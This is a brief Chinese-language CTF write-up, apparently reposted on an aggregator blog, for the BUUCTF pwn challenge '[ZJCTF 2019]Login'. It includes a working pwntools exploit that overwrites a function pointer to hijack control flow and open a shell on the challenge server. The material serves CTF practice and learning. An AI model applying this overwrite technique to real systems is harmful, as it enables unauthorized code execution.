[BUUCTF-pwn]——[ZJCTF 2019]Login
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——[ZJCTF 2019]Login
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——[ZJCTF 2019]Login
- 題目地址:https://buuoj.cn/challenges#[ZJCTF%202019]Login
這道題學習還是很多的, 有的時候在源碼中跟蹤并不一定比在匯編代碼中跟蹤更快
這里最后一個函數的第一個參數會被當做函數執行,這里我就開始找那個地方可以將這個參數給改了。
v7也就是v3然后找來找去沒發現。
不過匯編總是有奇效
這里有一篇博客超級詳細, 我也就不在這里贅述了。
點擊轉跳
exploit
from pwn import * p = remote('node3.buuoj.cn',25328) payload = '2jctf_pa5sw0rd'.ljust(0x48, '\x00') + p64(0x400e88) p.sendlineafter('username: ', 'admin') p.sendafter('password: ', payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——[ZJCTF 2019]Login的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——wustct
- 下一篇: [BUUCTF-pwn]——suctf_